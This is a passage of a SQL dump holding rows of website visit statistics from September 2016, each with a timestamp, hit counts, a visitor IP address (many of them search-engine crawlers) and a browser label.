),(60720,1473172646,1,1,0,0,'66.249.76.81','chrome'),(60721,1473173013,1,1,0,0,'91.196.178.33','chrome'),(60722,1473174173,1,0,1,0,'68.180.230.178',''),(60723,1473174332,1,1,0,0,'66.249.93.28','other'),(60724,1473174808,1,1,0,0,'163.172.66.39','other'),(60725,1473175661,1,1,0,0,'51.255.65.47','other'),(60726,1473176340,1,1,0,0,'163.172.65.230','other'),(60727,1473177199,1,1,0,0,'163.172.65.14','other'),(60728,1473177924,1,1,0,0,'66.249.93.29','other'),(60729,1473178013,1,1,0,0,'163.172.66.150','other'),(60730,1473178253,1,1,0,0,'51.255.65.35','other'),(60731,1473178400,1,0,1,0,'68.180.230.178',''),(60732,1473178648,1,1,0,0,'51.255.65.45','other'),(60733,1473178928,1,1,0,0,'91.196.178.70','firefox'),(60734,1473179133,1,1,0,0,'164.132.161.89','other'),(60735,1473179328,1,1,0,0,'51.255.65.85','other'),(60736,1473179832,1,1,0,0,'51.255.65.28','other'),(60737,1473179880,1,1,0,0,'163.172.65.126','other'),(60738,1473179924,1,1,0,0,'51.255.65.32','other'),(60739,1473180843,1,1,0,0,'163.172.66.59','other'),(60740,1473181160,1,1,0,0,'91.196.178.71','chrome'),(60741,1473181238,1,1,0,0,'163.172.66.165','other'),(60742,1473181322,1,1,0,0,'164.132.161.7','other'),(60743,1473181336,1,1,0,0,'164.132.161.15','other'),(60744,1473181648,1,0,1,0,'66.249.66.84',''),(60745,1473181983,1,1,0,0,'66.249.93.27','other'),(60746,1473182078,1,1,0,0,'163.172.65.11','other'),(60747,1473182866,1,1,0,0,'91.196.178.67','chrome'),(60748,1473183072,1,1,0,0,'164.132.161.41','other'),(60749,1473183383,1,1,0,0,'163.172.66.41','other'),(60750,1473184485,1,1,0,0,'51.255.65.56','other'),(60751,1473184839,1,1,0,0,'163.172.65.15','other'),(60752,1473185170,1,1,0,0,'66.249.93.29','other'),(60753,1473186132,1,1,0,0,'51.255.65.41','other'),(60754,1473186378,1,1,0,0,'51.255.65.33','other'),(60755,1473186667,1,1,0,0,'51.255.65.25','other'),(60756,1473186739,1,1,0,0,'164.132.161.32','other'),(60757,1473187150,1,1,0,0,'66.249.76.59','chrome'),(60758,1473187155,1,1,0,0,'51.255.65.16','other'),(60759,1473187261,1,1,0,0,'51.255.65.22','other'),(60760,1473187809,1,1,0,0,'207.46.13.55','other'),(60761,1473188233,1,1,0,0,'51.255.65.50','other'),(60762,1473188468,1,1,0,0,'164.132.161.56','other'),(60763,1473188725,1,1,0,0,'66.249.93.27','other'),(60764,1473188918,1,0,1,0,'68.180.230.222',''),(60765,1473189263,1,1,0,0,'163.172.66.63','other'),(60766,1473189584,1,1,0,0,'180.76.15.29','other'),(60767,1473190959,1,1,0,0,'157.55.39.174','other'),(60768,1473192462,1,1,0,0,'163.172.66.21','other'),(60769,1473192676,1,1,0,0,'66.249.93.28','other'),(60770,1473193063,1,1,0,0,'51.255.65.57','other'),(60771,1473194184,1,1,0,0,'164.132.161.14','other'),(60772,1473194516,1,1,0,0,'141.8.142.61','other'),(60773,1473195181,1,1,0,0,'51.255.65.54','other'),(60774,1473195455,1,1,0,0,'163.172.65.252','other'),(60775,1473195926,1,1,0,0,'66.249.93.29','other'),(60776,1473196136,1,1,0,0,'51.255.65.21','other'),(60777,1473197002,1,1,0,0,'51.255.65.19','other'),(60778,1473197151,1,1,0,0,'51.255.65.97','other'),(60779,1473198015,1,0,1,0,'66.249.66.84',''),(60780,1473198736,1,1,0,0,'163.172.65.213','other'),(60781,1473199820,1,1,0,0,'66.249.93.28','other'),(60782,1473200088,1,1,0,0,'130.193.51.19','other'),(60783,1473200615,1,1,0,0,'207.46.13.55','other'),(60784,1473201826,1,1,0,0,'163.172.66.88','other'),(60785,1473203133,1,1,0,0,'66.249.93.28','other'),(60786,1473204638,1,1,0,0,'51.254.32.63','other'),(60787,1473204903,1,1,0,0,'130.193.50.34','other'),(60788,1473205236,1,1,0,0,'163.172.65.69','other'),(60789,1473206131,1,0,1,0,'66.249.66.81',''),(60790,1473206851,1,1,0,0,'66.249.93.28','other'),(60791,1473206953,1,0,1,0,'66.249.76.61',''),(60792,1473208206,1,0,1,0,'66.249.66.84',''),(60793,1473208839,1,1,0,0,'66.249.76.61','chrome'),(60794,1473210332,1,1,0,0,'66.249.93.29','other'),(60795,1473211131,1,1,0,0,'163.172.65.229','other'),(60796,1473211200,1,1,0,0,'163.172.66.136','other'),(60797,1473211961,77,77,0,0,'208.43.225.85','other'),(60798,1473212183,123,123,0,0,'208.43.225.84','other'),(60799,1473213912,1,1,0,0,'163.172.65.227','other'),(60800,1473214241,1,1,0,0,'66.249.93.28','other'),(60801,1473217205,1,1,0,0,'163.172.65.201','other'),(60802,1473217653,1,1,0,0,'66.249.93.27','other'),(60803,1473218643,1,1,0,0,'51.255.65.3','other'),(60804,1473218675,1,1,0,0,'163.172.65.61','other'),(60805,1473219301,1,1,0,0,'163.172.66.40','other'),(60806,1473219896,1,1,0,0,'207.46.13.177','other'),(60807,1473220690,1,1,0,0,'141.8.183.25','other'),(60808,1473221185,1,1,0,0,'66.249.93.27','other'),(60809,1473221539,4,4,0,0,'178.203.120.68','other'),(60810,1473222107,1,0,1,0,'66.249.76.61',''),(60811,1473222358,1,1,0,0,'207.46.13.136','other'),(60812,1473222515,1,1,0,0,'180.76.15.137','other'),(60813,1473223331,1,1,0,0,'130.193.51.19','other'),(60814,1473223593,1,1,0,0,'66.249.76.60','chrome'),(60815,1473224363,1,1,0,0,'130.193.50.34','other'),(60816,1473224541,1,1,0,0,'130.193.51.19','other'),(60817,1473226203,1,1,0,0,'66.102.9.27','chrome'),(60818,1473226443,1,1,0,0,'193.34.94.57','chrome'),(60819,1473228525,1,1,0,0,'66.249.93.28','other'),(60820,1473229025,1,0,1,0,'66.249.76.61',''),(60821,1473230394,1,1,0,0,'92.113.126.61','firefox'),(60822,1473231034,1,1,0,0,'188.239.32.177','chrome'),(60823,1473231993,1,1,0,0,'66.249.93.29','other'),(60824,1473232447,1,1,0,0,'91.196.178.130','firefox'),(60825,1473233060,1,1,0,0,'178.94.64.240','chrome'),(60826,1473233424,1,1,0,0,'163.172.64.180','other'),(60827,1473233490,1,1,0,0,'92.113.126.61','firefox'),(60828,1473234093,1,0,1,0,'66.249.76.59',''),(60829,1473234194,1,1,0,0,'94.179.71.11','firefox'),(60830,1473234261,1,1,0,0,'51.255.65.79','other'),(60831,1473234496,1,1,0,0,'66.249.66.87','chrome'),(60832,1473234621,1,1,0,0,'66.249.76.60','chrome'),(60833,1473234676,1,1,0,0,'163.172.64.217','other'),(60834,1473235786,1,1,0,0,'66.249.93.29','other'),(60835,1473236024,1,1,0,0,'91.196.178.67','chrome'),(60836,1473236122,1,1,0,0,'141.8.142.58','other'),(60837,1473236372,1,1,0,0,'163.172.65.53','other'),(60838,1473236501,1,1,0,0,'163.172.65.57','other'),(60839,1473236675,1,1,0,0,'217.69.133.240','other'),(60840,1473236722,1,1,0,0,'192.166.134.151','chrome'),(60841,1473236776,1,1,0,0,'51.255.65.91','other'),(60842,1473237652,1,0,1,0,'68.180.230.222',''),(60843,1473238525,1,1,0,0,'94.179.10.98','firefox'),(60844,1473238637,1,1,0,0,'163.172.64.241','other'),(60845,1473238808,1,1,0,0,'91.196.178.70','chrome'),(60846,1473239055,1,1,0,0,'91.196.178.67','chrome'),(60847,1473239109,1,1,0,0,'51.255.65.28','other'),(60848,1473239474,1,1,0,0,'66.249.93.29','other'),(60849,1473239576,1,1,0,0,'163.172.66.16','other'),(60850,1473239905,1,1,0,0,'164.132.161.4','other'),(60851,1473240079,1,1,0,0,'207.46.13.177','other'),(60852,1473240779,1,1,0,0,'163.172.64.193','other'),(60853,1473241049,1,1,0,0,'178.93.76.183','chrome'),(60854,1473241150,1,1,0,0,'51.255.65.37','other'),(60855,1473241672,1,1,0,0,'163.172.66.55','other'),(60856,1473241924,1,1,0,0,'164.132.161.68','other'),(60857,1473242277,1,1,0,0,'141.0.13.214','chrome'),(60858,1473242289,1,1,0,0,'119.147.146.189','chrome'),(60859,1473242300,1,1,0,0,'130.193.51.19','other'),(60860,1473242324,1,1,0,0,'119.147.146.195','chrome'),(60861,1473242510,1,1,0,0,'141.8.142.58','other'),(60862,1473242696,1,1,0,0,'141.8.183.25','other'),(60863,1473242793,1,1,0,0,'66.249.93.29','other'),(60864,1473242910,1,1,0,0,'164.132.161.95','other'),(60865,1473243636,1,1,0,0,'180.76.15.149','other'),(60866,1473243834,1,1,0,0,'163.172.66.53','other'),(60867,1473243960,1,1,0,0,'163.172.66.141','other'),(60868,1473244003,1,1,0,0,'91.196.178.38','firefox'),(60869,1473244696,1,1,0,0,'164.132.161.68','other'),(60870,1473245253,1,1,0,0,'207.46.13.158','other'),(60871,1473245374,1,1,0,0,'163.172.65.112','other'),(60872,1473245424,1,1,0,0,'188.239.32.177','chrome'),(60873,1473245965,1,1,0,0,'163.172.64.254','other'),(60874,1473246024,1,1,0,0,'91.196.178.134','firefox'),(60875,1473246196,1,1,0,0,'163.172.65.66','other'),(60876,1473246626,1,1,0,0,'66.249.93.28','other'),(60877,1473246917,1,1,0,0,'51.255.65.10','other'),(60878,1473247038,1,1,0,0,'163.172.66.111','other'),(60879,1473247342,1,1,0,0,'94.178.50.210','chrome'),(60880,1473247371,1,1,0,0,'141.8.142.58','other'),(60881,1473248210,1,1,0,0,'178.151.34.194','chrome'),(60882,1473248595,1,1,0,0,'91.236.248.241','firefox'),(60883,1473248638,1,1,0,0,'164.132.161.30','other'),(60884,1473248719,1,1,0,0,'37.55.226.183','chrome'),(60885,1473249130,1,1,0,0,'163.172.65.235','other'),(60886,1473249356,1,1,0,0,'91.196.178.70','chrome'),(60887,1473249711,1,1,0,0,'195.5.34.194','firefox'),(60888,1473249824,1,1,0,0,'94.231.185.97','chrome'),(60889,1473249927,1,1,0,0,'66.249.93.29','other'),(60890,1473250147,1,1,0,0,'163.172.66.17','other'),(60891,1473250285,1,1,0,0,'163.172.66.60','other'),(60893,1473250428,1,1,0,0,'178.92.209.90','chrome'),(60894,1473250792,1,1,0,0,'163.172.66.68','other'),(60895,1473250917,1,1,0,0,'91.196.178.130','firefox'),(60896,1473251943,1,1,0,0,'163.172.64.246','other'),(60897,1473251948,1,1,0,0,'51.255.65.97','other'),(60898,1473252323,1,1,0,0,'91.196.178.33','chrome'),(60899,1473252798,1,0,1,0,'66.249.76.61',''),(60900,1473253003,1,1,0,0,'217.77.213.51','firefox'),(60901,1473253042,1,1,0,0,'212.79.124.16','chrome'),(60902,1473253331,1,1,0,0,'51.255.65.75','other'),(60903,1473253335,1,1,0,0,'91.229.241.213','chrome'),(60904,1473253382,1,1,0,0,'180.76.15.155','other'),(60905,1473253411,1,1,0,0,'163.172.66.45','other'),(60906,1473253524,1,1,0,0,'66.249.93.27','other'),(60907,1473253605,1,0,1,0,'66.249.76.59',''),(60908,1473253662,1,1,0,0,'31.134.112.23','opera'),(60909,1473253817,1,1,0,0,'163.172.66.128','other'),(60910,1473254043,1,1,0,0,'66.249.76.59','chrome'),(60911,1473254065,1,1,0,0,'66.249.76.79','chrome'),(60912,1473254876,1,1,0,0,'37.110.110.188','msie'),(60913,1473254894,1,1,0,0,'95.24.56.232','msie'),(60914,1473254895,1,1,0,0,'128.68.23.0','msie'),(60917,1473254943,1,1,0,0,'164.132.161.35','other'),(60918,1473255111,1,1,0,0,'163.172.66.85','other'),(60919,1473255117,1,1,0,0,'51.255.65.23','other'),(60920,1473255153,1,1,0,0,'163.172.65.54','other'),(60921,1473255192,1,1,0,0,'164.132.161.91','other'),(60922,1473255294,1,1,0,0,'194.44.191.190','firefox'),(60923,1473255364,1,1,0,0,'207.46.13.136','other'),(60924,1473255393,1,1,0,0,'163.172.66.81','other'),(60925,1473256062,1,1,0,0,'164.132.161.59','other'),(60926,1473256453,3,3,0,0,'51.254.97.219','other'),(60927,1473257076,1,1,0,0,'91.196.178.66','firefox'),(60928,1473257166,1,1,0,0,'66.249.93.28','chrome'),(60929,1473257215,1,1,0,0,'66.249.93.27','other'),(60930,1473257966,1,1,0,0,'163.172.66.84','other'),(60931,1473258689,1,1,0,0,'163.172.66.80','other'),(60932,1473258979,1,1,0,0,'163.172.65.181','other'),(60933,1473259094,1,0,1,0,'66.249.76.77',''),(60934,1473259409,1,1,0,0,'51.255.65.21','other'),(60935,1473259536,1,1,0,0,'163.172.66.8','other'),(60936,1473259614,1,1,0,0,'164.132.161.56','other'),(60937,1473259630,1,1,0,0,'164.132.161.70','other'),(60938,1473259638,1,0,1,0,'66.249.76.79',''),(60939,1473260517,4,4,0,0,'176.9.10.227','other'),(60940,1473260678,1,1,0,0,'51.255.65.59','other'),(60941,1473260767,1,1,0,0,'66.249.93.27','other'),(60942,1473260856,1,1,0,0,'163.172.66.143','other'),(60943,1473261071,1,1,0,0,'164.132.161.31','other'),(60944,1473261358,1,1,0,0,'163.172.66.117','other'),(60945,1473261673,1,1,0,0,'91.196.178.167','other'),(60946,1473262277,1,1,0,0,'164.132.161.90','other'),(60947,1473262313,1,1,0,0,'163.172.65.232','other'),(60948,1473262432,2,0,2,0,'66.249.76.60',''),(60949,1473262949,1,1,0,0,'163.172.66.111','other'),(60950,1473263184,1,1,0,0,'163.172.66.184','other'),(60951,1473263329,1,1,0,0,'164.132.161.4','other'),(60952,1473263334,1,1,0,0,'46.188.32.37','opera'),(60953,1473263335,1,1,0,0,'95.220.123.193','chrome'),(60954,1473263336,1,1,0,0,'128.69.205.229','firefox'),(60955,1473263337,1,1,0,0,'128.72.70.164','firefox'),(60956,1473263342,1,1,0,0,'128.69.223.191','firefox'),(60957,1473263343,1,1,0,0,'46.242.122.161','opera'),(60958,1473263655,1,1,0,0,'51.255.65.24','other'),(60959,1473263831,1,1,0,0,'91.196.178.66','chrome'),(60960,1473264075,1,0,1,0,'66.249.76.60',''),(60961,1473264348,1,1,0,0,'163.172.66.6','other'),(60962,1473264701,1,1,0,0,'66.249.93.28','other'),(60963,1473265399,1,1,0,0,'91.196.178.161','chrome'),(60964,1473267174,1,1,0,0,'69.30.234.2','other'),(60965,1473267497,1,1,0,0,'66.249.76.61','chrome'),(60966,1473267764,133,133,0,0,'5.9.73.227','other'),(60967,1473267820,1,1,0,0,'37.140.189.221','chrome'),(60968,1473268326,1,1,0,0,'66.249.93.28','other'),(60969,1473269036,1,1,0,0,'46.211.2.79','chrome'),(60970,1473269071,1,1,0,0,'66.249.76.59','chrome'),(60971,1473269384,1,1,0,0,'163.172.66.66','other'),(60972,1473269970,1,1,0,0,'163.172.65.43','other'),(60973,1473270081,108,108,0,0,'5.9.88.103','other'),(60974,1473270250,1,0,1,0,'66.249.76.79',''),(60975,1473270816,1,1,0,0,'163.172.66.21','other'),(60976,1473270879,1,1,0,0,'92.113.126.61','firefox'),(60977,1473271611,1,1,0,0,'66.249.93.27','other'),(60978,1473271619,1,1,0,0,'51.255.65.37','other'),(60979,1473272192,1,1,0,0,'163.172.66.160','other'),(60980,1473272697,1,1,0,0,'91.196.178.130','chrome'),(60981,1473273300,1,0,1,0,'68.180.230.222',''),(60982,1473273474,1,1,0,0,'163.172.66.151','other'),(60983,1473273495,1,1,0,0,'163.172.66.154','other'),(60984,1473273614,1,1,0,0,'207.46.13.55','other'),(60985,1473274590,1,1,0,0,'180.76.15.17','other'),(60986,1473275073,1,1,0,0,'163.172.65.5','other'),(60987,1473275120,1,1,0,0,'66.249.93.29','other'),(60988,1473275222,1,1,0,0,'207.46.13.55','other'),(60989,1473275273,1,1,0,0,'163.172.66.63','other'),(60990,1473275951,1,1,0,0,'164.132.161.70','other'),(60991,1473277568,1,0,1,0,'66.249.66.81',''),(60992,1473277634,1,1,0,0,'141.8.142.67','other'),(60993,1473277986,1,1,0,0,'5.9.89.170','other'),(60994,1473278080,1,0,1,0,'66.249.76.61',''),(60995,1473278190,1,1,0,0,'163.172.64.252','other'),(60996,1473278307,1,1,0,0,'207.46.13.158','other'),(60997,1473278720,1,1,0,0,'66.249.93.28','other'),(60998,1473278926,1,1,0,0,'163.172.65.19','other'),(60999,1473279139,1,1,0,0,'163.172.65.119','other'),(61000,1473279381,1,1,0,0,'91.196.178.165','chrome'),(61001,1473279803,1,1,0,0,'92.113.126.61','firefox'),(61002,1473279872,1,1,0,0,'51.255.65.87','other'),(61003,1473280809,1,1,0,0,'164.132.161.53','other'),(61004,1473281602,1,1,0,0,'163.172.65.236','other'),(61005,1473281944,1,1,0,0,'163.172.65.113','other'),(61006,1473282457,1,1,0,0,'66.249.93.28','other'),(61007,1473282567,1,1,0,0,'51.255.65.72','other'),(61008,1473282778,1,1,0,0,'163.172.66.100','other'),(61009,1473284103,1,1,0,0,'163.172.65.188','other'),(61010,1473285495,1,1,0,0,'163.172.66.98','other'),(61011,1473285560,1,0,1,0,'66.249.66.180',''),(61012,1473285666,1,1,0,0,'51.255.65.37','other'),(61013,1473285920,1,1,0,0,'163.172.66.142','other'),(61014,1473286013,1,1,0,0,'82.145.220.122','other'),(61015,1473286139,1,1,0,0,'66.249.93.28','other'),(61016,1473287619,1,1,0,0,'164.132.161.74','other'),(61017,1473287681,1,1,0,0,'5.9.88.103','other'),(61018,1473288470,3,3,0,0,'89.163.148.22','other'),(61019,1473289278,1,1,0,0,'164.132.161.49','other'),(61020,1473289524,1,1,0,0,'66.249.93.28','other'),(61021,1473289717,1,1,0,0,'164.132.161.93','other'),(61022,1473290515,1,1,0,0,'163.172.66.50','other'),(61023,1473292961,1,1,0,0,'164.132.161.46','other'),(61024,1473293316,1,1,0,0,'164.132.161.79','other'),(61025,1473293508,1,1,0,0,'66.249.93.27','other'),(61026,1473294069,1,1,0,0,'163.172.65.191','other'),(61027,1473296172,8,8,0,0,'5.9.89.170','other'),(61028,1473296558,1,1,0,0,'163.172.66.60','other'),(61029,1473296721,1,1,0,0,'66.102.9.27','other'),(61030,1473297668,1,1,0,0,'163.172.65.188','other'),(61031,1473298507,1,0,1,0,'66.249.76.59',''),(61032,1473298597,1,0,1,0,'66.249.76.61',''),(61033,1473299021,1,1,0,0,'163.172.66.51','other'),(61034,1473299857,1,0,1,0,'66.249.76.60',''),(61035,1473300320,1,1,0,0,'66.102.9.25','other'),(61036,1473300731,1,1,0,0,'164.132.161.30','other'),(61037,1473301161,1,0,1,0,'66.249.66.84',''),(61038,1473302095,1,0,1,0,'66.249.66.81',''),(61039,1473302458,1,1,0,0,'163.172.66.23','other'),(61040,1473303815,1,1,0,0,'51.255.65.52','other'),(61041,1473303921,1,1,0,0,'66.102.9.25','other'),(61042,1473306673,1,0,1,0,'66.249.76.114',''),(61043,1473307521,1,1,0,0,'66.102.9.27','other'),(61044,1473308048,1,1,0,0,'164.132.161.15','other'),(61045,1473309271,1,1,0,0,'141.8.142.61','other'),(61046,1473309279,1,1,0,0,'163.172.65.66','other'),(61047,1473310632,1,1,0,0,'94.179.26.69','chrome'),(61048,1473311263,1,0,1,0,'68.180.230.222',''),(61049,1473311452,1,1,0,0,'91.196.178.68','firefox'),(61050,1473311558,1,1,0,0,'94.179.125.14','firefox'),(61051,1473311564,1,1,0,0,'91.196.178.129','chrome'),(61052,1473311601,1,1,0,0,'66.102.9.27','other'),(61053,1473311901,1,1,0,0,'51.255.65.45','other'),(61054,1473312448,2,2,0,0,'94.178.7.54','chrome'),(61055,1473313019,1,1,0,0,'91.196.178.68','chrome'),(61056,1473313072,1,1,0,0,'95.134.126.104','chrome'),(61057,1473313094,1,1,0,0,'130.193.50.34','other'),(61058,1473313151,1,1,0,0,'51.255.65.5','other'),(61059,1473313352,1,1,0,0,'163.172.64.188','other'),(61060,1473313606,1,1,0,0,'163.172.66.106','other'),(61061,1473313951,1,1,0,0,'37.55.171.193','chrome'),(61062,1473314572,1,1,0,0,'91.196.178.68','firefox'),(61063,1473314748,1,1,0,0,'66.102.9.27','other'),(61064,1473314782,1,1,0,0,'180.76.15.23','other'),(61065,1473314847,1,1,0,0,'91.196.178.68','chrome'),(61066,1473315860,1,1,0,0,'31.41.70.15','opera'),(61067,1473316190,1,1,0,0,'91.196.178.66','chrome'),(61068,1473316461,1,1,0,0,'91.196.177.94','chrome'),(61069,1473317240,1,1,0,0,'91.196.178.162','chrome'),(61070,1473318595,1,1,0,0,'91.196.178.68','firefox'),(61071,1473318750,1,1,0,0,'91.196.178.134','chrome'),(61072,1473318806,1,1,0,0,'82.207.91.234','firefox'),(61073,1473318871,1,1,0,0,'91.196.178.68','chrome'),(61074,1473319305,1,1,0,0,'94.153.233.14','chrome'),(61075,1473320076,1,1,0,0,'46.211.7.148','chrome'),(61076,1473320622,1,1,0,0,'91.196.178.68','firefox'),(61077,1473320632,1,1,0,0,'91.196.178.134','chrome'),(61078,1473321392,1,1,0,0,'51.255.65.95','other'),(61079,1473321416,1,1,0,0,'188.163.75.56','chrome'),(61080,1473321828,1,1,0,0,'164.132.161.56','other'),(61081,1473321856,1,1,0,0,'37.55.101.129','chrome'),(61082,1473322546,1,1,0,0,'91.196.178.68','firefox'),(61083,1473322734,1,1,0,0,'91.196.178.169','chrome'),(61084,1473323577,1,1,0,0,'164.132.161.77','other'),(61085,1473323592,1,1,0,0,'80.254.155.43','chrome'),(61086,1473323595,1,1,0,0,'66.249.66.87','chrome'),(61087,1473323718,1,1,0,0,'66.249.76.47','chrome'),(61088,1473323782,1,1,0,0,'91.196.178.169','chrome'),(61089,1473323837,1,1,0,0,'91.196.178.68','chrome'),(61090,1473323866,1,1,0,0,'141.8.142.61','other'),(61091,1473324326,1,1,0,0,'82.145.220.185','chrome'),(61092,1473324331,1,1,0,0,'163.172.65.217','other'),(61093,1473324454,1,1,0,0,'163.172.64.254','other'),(61094,1473324668,1,1,0,0,'91.196.178.71','firefox'),(61095,1473324910,1,1,0,0,'91.196.178.68','firefox'),(61096,1473324921,1,1,0,0,'163.172.66.166','other'),(61097,1473324973,2,2,0,0,'141.8.183.25','other'),(61098,1473325108,1,1,0,0,'212.111.197.82','chrome'),(61099,1473325158,1,1,0,0,'66.249.66.87','chrome'),(61100,1473325347,1,1,0,0,'66.249.76.79','chrome'),(61101,1473325757,1,0,1,0,'66.249.76.45',''),(61102,1473326216,1,0,1,0,'66.249.76.47',''),(61103,1473326832,1,1,0,0,'92.112.55.84','firefox'),(61104,1473326904,1,1,0,0,'141.8.183.25','other'),(61105,1473327009,1,1,0,0,'91.196.177.26','firefox'),(61106,1473327303,1,1,0,0,'94.179.4.29','firefox'),(61107,1473327863,1,1,0,0,'164.132.161.11','other'),(61108,1473327951,1,1,0,0,'130.193.51.19','other'),(61109,1473328081,1,1,0,0,'141.8.183.19','other'),(61110,1473328933,1,1,0,0,'163.172.65.109','other'),(61111,1473329177,1,1,0,0,'164.132.161.42','other'),(61112,1473329416,2,2,0,0,'141.8.142.58','other'),(61113,1473330097,3,3,0,0,'130.193.50.34','other'),(61114,1473330341,2,2,0,0,'149.202.49.56','other'),(61115,1473332530,1,1,0,0,'188.32.128.47','msie'),(61116,1473332718,17,17,0,0,'5.9.88.103','other'),(61117,1473332850,1,1,0,0,'85.30.249.222','msie'),(61118,1473333339,1,1,0,0,'91.196.178.132','chrome'),(61119,1473333683,1,1,0,0,'91.196.178.35','chrome'),(61120,1473334895,1,1,0,0,'94.179.27.200','chrome'),(61121,1473335250,1,1,0,0,'91.196.178.129','firefox'),(61122,1473335335,1,1,0,0,'91.196.178.66','chrome'),(61123,1473335629,1,1,0,0,'5.228.126.21','msie'),(61124,1473335805,1,1,0,0,'46.73.202.84','msie'),(61125,1473336381,1,1,0,0,'91.196.178.68','firefox'),(61126,1473336744,1,1,0,0,'207.46.13.158','other'),(61127,1473337337,1,0,1,0,'66.249.76.45',''),(61128,1473337440,1,1,0,0,'163.172.66.178','other'),(61129,1473337957,1,1,0,0,'91.196.178.162','chrome'),(61130,1473338118,1,1,0,0,'163.172.66.51','other'),(61131,1473338402,1,1,0,0,'82.145.221.62','chrome'),(61132,1473339423,1,1,0,0,'178.219.88.19','msie'),(61133,1473340014,1,1,0,0,'141.0.13.79','other'),(61134,1473340087,1,1,0,0,'46.201.175.251','chrome'),(61135,1473340090,1,1,0,0,'163.172.64.233','other'),(61136,1473340662,1,1,0,0,'91.196.178.169','chrome'),(61137,1473341186,1,1,0,0,'91.196.178.66','firefox'),(61138,1473341433,1,1,0,0,'178.94.213.149','chrome'),(61139,1473341781,2,2,0,0,'91.196.178.68','firefox'),(61140,1473341782,1,1,0,0,'46.211.155.170','chrome'),(61141,1473342104,1,1,0,0,'31.41.70.15','opera'),(61142,1473342571,2,2,0,0,'40.77.167.28','other'),(61143,1473342913,2,2,0,0,'91.196.178.68','firefox'),(61144,1473343302,1,1,0,0,'163.172.65.245','other'),(61145,1473343587,1,1,0,0,'157.55.39.87','other'),(61146,1473343782,1,1,0,0,'91.196.178.162','chrome'),(61147,1473343826,1,1,0,0,'164.132.161.81','other'),(61148,1473344753,1,1,0,0,'163.172.65.19','other'),(61149,1473346163,1,1,0,0,'51.255.65.56','other'),(61150,1473346405,1,1,0,0,'163.172.66.89','other'),(61151,1473346665,1,1,0,0,'91.196.178.131','firefox'),(61152,1473346811,1,0,1,0,'66.249.76.47',''),(61153,1473346999,1,1,0,0,'163.172.65.5','other'),(61154,1473347269,1,1,0,0,'141.8.142.61','other'),(61155,1473347273,1,1,0,0,'178.154.149.10','other'),(61156,1473347426,1,1,0,0,'164.132.161.3','other'),(61157,1473347589,1,1,0,0,'163.172.64.185','other'),(61158,1473347668,1,1,0,0,'91.196.178.131','firefox'),(61159,1473347727,1,1,0,0,'51.255.65.81','other'),(61160,1473348278,1,0,1,0,'66.249.76.47',''),(61161,1473348364,1,1,0,0,'51.255.65.67','other'),(61162,1473348924,1,1,0,0,'164.132.161.97','other'),(61163,1473349870,1,1,0,0,'91.196.178.71','chrome'),(61164,1473351030,1,1,0,0,'163.172.65.240','other'),(61165,1473351435,2,0,2,0,'66.249.76.46',''),(61166,1473351905,1,1,0,0,'163.172.65.54','other'),(61167,1473352141,1,1,0,0,'91.196.178.65','firefox'),(61168,1473352193,1,0,1,0,'66.249.79.179',''),(61169,1473352576,1,1,0,0,'52.3.243.47','other'),(61170,1473352626,1,1,0,0,'163.172.64.245','other'),(61171,1473352831,1,1,0,0,'163.172.66.120','other'),(61172,1473353391,1,1,0,0,'163.172.66.34','other'),(61173,1473353975,1,0,1,0,'66.249.76.45',''),(61174,1473354080,1,1,0,0,'163.172.65.216','other'),(61175,1473354733,1,0,1,0,'66.249.79.182',''),(61176,1473356338,1,1,0,0,'92.113.174.152','firefox'),(61177,1473356400,1,0,1,0,'66.249.76.45',''),(61178,1473356535,1,0,1,0,'66.249.76.47',''),(61179,1473360302,1,0,1,0,'66.249.76.45',''),(61180,1473360629,1,1,0,0,'163.172.65.7','other'),(61181,1473361232,1,1,0,0,'91.196.178.136','chrome'),(61182,1473361274,1,0,1,0,'66.249.76.47',''),(61183,1473361405,1,1,0,0,'136.243.152.18','other'),(61184,1473361523,1,1,0,0,'66.102.9.29','other'),(61185,1473361874,1,1,0,0,'46.211.144.66','chrome'),(61186,1473362641,1,1,0,0,'163.172.65.233','other'),(61187,1473362718,1,1,0,0,'130.193.50.34','other'),(61188,1473363045,1,1,0,0,'92.113.174.152','firefox'),(61189,1473363988,1,0,1,0,'66.249.76.47',''),(61190,1473364425,1,1,0,0,'163.172.65.130','other'),(61191,1473364821,1,1,0,0,'163.172.66.181','other'),(61192,1473365293,1,1,0,0,'66.102.9.25','other'),(61193,1473366789,1,1,0,0,'164.132.161.64','other'),(61194,1473366804,1,0,1,0,'66.249.76.47',''),(61195,1473366810,2,0,2,0,'66.249.79.176',''),(61196,1473366814,1,1,0,0,'164.132.161.94','other'),(61197,1473368123,1,0,1,0,'66.249.76.46',''),(61198,1473368735,1,1,0,0,'66.102.9.27','other'),(61199,1473369231,2,2,0,0,'174.129.237.157','other'),(61200,1473369454,1,1,0,0,'66.249.79.176','chrome'),(61201,1473370401,1,1,0,0,'176.96.198.30','chrome'),(61202,1473371170,1,1,0,0,'130.193.50.34','other'),(61203,1473371218,1,0,1,0,'66.249.76.46',''),(61204,1473371603,1,1,0,0,'163.172.65.116','other'),(61205,1473371630,1,1,0,0,'174.129.237.157','other'),(61206,1473371808,1,1,0,0,'51.255.65.88','other'),(61207,1473371900,1,1,0,0,'163.172.65.28','other'),(61208,1473371977,1,1,0,0,'163.172.65.44','other'),(61209,1473372082,1,1,0,0,'164.132.161.19','other'),(61210,1473372201,1,1,0,0,'141.8.183.25','other'),(61211,1473372319,1,1,0,0,'164.132.161.49','other'),(61212,1473372779,1,1,0,0,'66.102.9.29','other'),(61213,1473372866,1,1,0,0,'163.172.65.54','other'),(61214,1473373061,1,1,0,0,'163.172.65.64','other'),(61215,1473373404,1,0,1,0,'66.249.79.182',''),(61216,1473374463,1,0,1,0,'66.249.76.46',''),(61217,1473375178,1,0,1,0,'66.249.79.79',''),(61218,1473376063,1,1,0,0,'163.172.66.17','other'),(61219,1473376274,1,1,0,0,'66.102.9.29','other'),(61220,1473377066,1,1,0,0,'66.249.76.45','chrome'),(61221,1473377375,1,1,0,0,'5.255.250.41','other'),(61222,1473377501,1,1,0,0,'141.8.142.58','other'),(61223,1473377629,1,1,0,0,'130.193.50.34','other'),(61224,1473377899,1,1,0,0,'163.172.66.74','other'),(61225,1473377997,1,1,0,0,'164.132.161.56','other'),(61226,1473378396,2,0,2,0,'66.249.66.87',''),(61227,1473378710,1,1,0,0,'163.172.66.61','other'),(61228,1473378711,1,0,1,0,'66.249.76.45',''),(61229,1473378760,1,1,0,0,'163.172.66.176','other'),(61230,1473379167,1,1,0,0,'130.193.50.34','other'),(61231,1473379286,1,1,0,0,'163.172.65.180','other'),(61232,1473379443,1,1,0,0,'163.172.